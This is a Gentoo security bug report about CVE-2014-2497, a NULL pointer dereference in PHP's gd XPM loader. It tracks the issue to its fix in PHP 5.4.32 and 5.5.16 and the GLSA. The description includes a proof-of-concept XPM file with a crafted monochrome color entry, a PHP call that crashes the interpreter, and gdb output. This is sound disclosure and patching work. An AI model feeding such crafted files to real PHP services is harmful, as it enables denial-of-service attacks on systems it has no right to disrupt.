Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 505172 - <dev-lang/php-{5.4.32,5.5.16} : php-gd 'c_color' NULL pointer dereference (CVE-2014-2497)
Summary: <dev-lang/php-{5.4.32,5.5.16} : php-gd 'c_color' NULL pointer dereference (CV...
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Vulnerabilities (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Gentoo Security
URL: https://bugs.php.net/bug.php?id=66901
Whiteboard: A3 [glsa]
Keywords:
Depends on:
Blocks:
 
Reported: 2014-03-20 13:52 UTC by Agostino Sarubbo
Modified: 2014-08-31 11:27 UTC (History)
1 user (show)

See Also:
Package list:
Runtime testing required: ---


Attachments

Note You need to log in before you can comment on or make changes to this bug.
Description Agostino Sarubbo gentoo-dev 2014-03-20 13:52:53 UTC
From ${URL} :

Description:
------------
php-gd <= v5.4.17-2 'c_color' NULL pointer dereference

so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c:
---------------------------------------------------------------------------------

gdImagePtr gdImageCreateFromXpm (char *filename)
{
    XpmInfo info;
    XpmImage image;
    int i, j, k, number;
    char buf[5];
    gdImagePtr im = 0;
    int *pointer;
    int red = 0, green = 0, blue = 0;
    int *colors;
    int ret;

    ret = XpmReadFileToXpmImage(filename, &image, &info);
    if (ret != XpmSuccess) {
        return 0;
    }

    if (!(im = gdImageCreate(image.width, image.height))) {
        goto done;
    }

        number = image.ncolors;
        colors = (int *) safe_emalloc(number, sizeof(int), 0);
        for (i = 0; i < number; i++) {
        switch (strlen (image.colorTable[i].c_color)) {             // BOOM
--------------------------------------------------------------------------------------------------------

The call to strlen() parses image.colorTable[i].c_color which is initialised as NULL if the particular color mapping
uses a different key (such as monochrome/monovisual).

The xpmColorKeys array stores all avaliable keys and can be found in libXpm:
----------------------------------------------------------------------------
const char *xpmColorKeys[] = {
    "s",                /* key #1: symbol */
    "m",                /* key #2: mono visual */
    "g4",               /* key #3: 4 grays visual */
    "g",                /* key #4: gray visual */
    "c",                /* key #5: color visual */
};

The following xpm file will trigger the bug:
--------------------------------------------
/* XPM */
static char * gv_xpm[] = {
"13 13   6 1",
"A  c #FFFFFF " /* "0" */,
"B  c #CCCCCC " /* "0.0399" */,
"C  c #999999 " /* "0.0798" */,
"D  m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E  c #333333 " /* "0.16" */,
"F  c #000000 " /* "0.2" */,
/* x-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",
---------------------------------------------

POC: 

php > imagecreatefromxpm("monochome-poc.xpm");

(gdb) p colorTable[0]
$2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"}
(gdb) p colorTable[1]
$3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"}
(gdb) p colorTable[2]
$4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"}
(gdb) p colorTable[3]
$5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0}
(gdb) p colorTable[4]
$6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"}
(gdb) p colorTable[5]
$7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"}
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
__strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
39		movdqu	(%rdi), %xmm1
(gdb) bt
#0  __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39
#1  0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42
#2  0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, 
    ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534
#3  0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643
#4  0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410
#5  0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, 
    string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197
#6  0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664
#7  0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986
#8  0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364

Test script:
---------------
/* XPM */
static char * gv_xpm[] = {
"13 13   6 1",
"A  c #FFFFFF " /* "0" */,
"B  c #CCCCCC " /* "0.0399" */,
"C  c #999999 " /* "0.0798" */,
"D  m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */,
"E  c #333333 " /* "0.16" */,
"F  c #000000 " /* "0.2" */,
/* x-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
/* y-axis:  0 40 80 120 160 200 240 280 320 360 400 440 480 */
"FEDDDDCCCCCBA",
"FEDDDCCCCBBAB",

Expected result:
----------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Resource id #4
php >

Actual result:
--------------
php > print imagecreatefromxpm("monochome-poc.xpm")."\n";
Segmentation fault (core dumped)


@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.
Comment 1 Yury German Gentoo Infrastructure gentoo-dev Security 2014-06-16 05:53:59 UTC
Is this bug part of the Fix in current PHP (or previous) being stabilized?
Comment 2 Kristian Fiskerstrand gentoo-dev Security 2014-08-23 18:57:50 UTC
This is fixed in 5.5.16 and 5.4.32 currently in stabilization in bug 513032
Comment 3 GLSAMaker/CVETool Bot gentoo-dev 2014-08-25 02:35:16 UTC
CVE-2014-2497 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2497):
  The gdImageCreateFromXpm function in gdxpm.c in libgd, as used in PHP 5.4.26
  and earlier, allows remote attackers to cause a denial of service (NULL
  pointer dereference and application crash) via a crafted color table in an
  XPM file.
Comment 4 Yury German Gentoo Infrastructure gentoo-dev Security 2014-08-27 02:35:42 UTC
Stabilized and Cleaned up, adding to existing GLSA
Comment 5 GLSAMaker/CVETool Bot gentoo-dev 2014-08-31 11:27:26 UTC
This issue was resolved and addressed in
 GLSA 201408-11 at http://security.gentoo.org/glsa/glsa-201408-11.xml
by GLSA coordinator Kristian Fiskerstrand (K_F).